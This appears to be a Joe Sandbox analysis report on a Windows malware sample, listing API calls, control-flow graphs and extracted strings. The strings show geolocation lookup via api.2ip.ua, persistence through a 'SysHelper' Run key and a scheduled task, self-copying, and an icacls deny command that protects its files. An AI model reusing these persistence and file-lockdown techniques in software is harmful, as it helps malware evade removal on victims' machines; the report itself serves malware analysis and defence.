calls 2 library calls 45702->45716 45704 4201b3 45705 4201da 45704->45705 45717 4245dc 58 API calls 6 library calls 45704->45717 45705->45708 45718 42495e 58 API calls 6 library calls 45705->45718 45708->45677 45708->45680 45709->45679 45710->45684 45711->45687 45712->45697 45713->45687 45714->45692 45715->45684 45716->45704 45717->45705 45718->45708 45719->45370 45726 427e1a ___lock_fhandle 45725->45726 45727 428af7 __lock 51 API calls 45726->45727 45728 427e21 45727->45728 45729 427eda __cinit 45728->45729 45730 427e4f DecodePointer 45728->45730 45745 427f28 45729->45745 45730->45729 45732 427e66 DecodePointer 45730->45732 45738 427e76 45732->45738 45734 427f37 ___lock_fhandle 45734->45041 45736 427e83 EncodePointer 45736->45738 45737 427f1f 45739 427b0b _fast_error_exit 3 API calls 45737->45739 45738->45729 45738->45736 45740 427e93 DecodePointer EncodePointer 45738->45740 45741 427f28 45739->45741 45743 427ea5 DecodePointer DecodePointer 45740->45743 45742 427f35 45741->45742 45750 428c81 LeaveCriticalSection 45741->45750 45742->45041 45743->45738 45746 427f08 45745->45746 45747 427f2e 45745->45747 45746->45734 45749 428c81 LeaveCriticalSection 45746->45749 45751 428c81 LeaveCriticalSection 45747->45751 45749->45737 45750->45742 45751->45746
                APIs
                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                • GetLastError.KERNEL32 ref: 00419FD2
                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                • GetLastError.KERNEL32 ref: 00419FE4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005DB840,?), ref: 0041A0BB
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                • API String ID: 2957410896-3144399390
                • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040D26C
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                • VariantInit.OLEAUT32(?), ref: 0040D309
                • VariantInit.OLEAUT32(?), ref: 0040D322
                • VariantInit.OLEAUT32(?), ref: 0040D33B
                • VariantClear.OLEAUT32(?), ref: 0040D397
                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                • CoUninitialize.OLE32 ref: 0040D3D5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                • API String ID: 2496729271-1738591096
                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                APIs
                • _memset.LIBCMT ref: 0040CF4A
                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                Strings
                • "country_code":", xrefs: 0040CFE1
                • Microsoft Internet Explorer, xrefs: 0040CF5A
                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead_memset
                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                • API String ID: 1485416377-2962370585
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                • _memset.LIBCMT ref: 00411D3B
                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                • GetCommandLineW.KERNEL32 ref: 00411EB4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                • UuidCreate.RPCRT4(?), ref: 00411EFC
                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                • DeleteFileW.KERNEL32(?), ref: 00412036
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                • _memset.LIBCMT ref: 00412090
                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                • lstrlenW.KERNEL32(?), ref: 004120D7
                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                • _memset.LIBCMT ref: 00412120
                • SetLastError.KERNEL32(00000000), ref: 00412146
                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                • API String ID: 2589766509-1182136429
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                Control-flow Graph

                APIs
                • GetCommandLineW.KERNEL32 ref: 00412235
                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                • CloseHandle.KERNEL32(00000000), ref: 00412347
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                • API String ID: 3668891214-3807497772
                • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                APIs
                • _memset.LIBCMT ref: 004235B1
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __gmtime64_s.LIBCMT ref: 0042364A
                • __gmtime64_s.LIBCMT ref: 00423680
                • __gmtime64_s.LIBCMT ref: 0042369D
                • __allrem.LIBCMT ref: 004236F3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                • __allrem.LIBCMT ref: 00423726
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                • __allrem.LIBCMT ref: 0042375B
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                • String ID:
                • API String ID: 1503770280-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                APIs
                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                • ExitProcess.KERNEL32 ref: 00427B1A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess$AddressHandleModuleProc___crt
                • String ID: i;B
                • API String ID: 2427264223-472376889
                • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1063 40ef50-40ef7a call 420c62 1066 40efdc-40efe2 1063->1066 1067 40ef7c 1063->1067 1068 40ef80-40ef85 call 420c62 1067->1068 1070 40ef8a-40efbd call 42b420 1068->1070 1073 40efc0-40efcf 1070->1073 1073->1073 1074 40efd1-40efda 1073->1074 1074->1066 1074->1068
                APIs
                • _malloc.LIBCMT ref: 0040EF69
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040EF85
                • _memset.LIBCMT ref: 0040EF9B
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$AllocateHeap_memset
                • String ID:
                • API String ID: 3655941445-0
                • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1075 42fb64-42fb77 call 428520 1078 42fba5-42fbaa call 428565 1075->1078 1079 42fb79-42fb8c call 428af7 1075->1079 1084 42fb99-42fba0 call 42fbab 1079->1084 1085 42fb8e call 42fe47 1079->1085 1084->1078 1088 42fb93 1085->1088 1088->1084
                APIs
                • __lock.LIBCMT ref: 0042FB7B
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
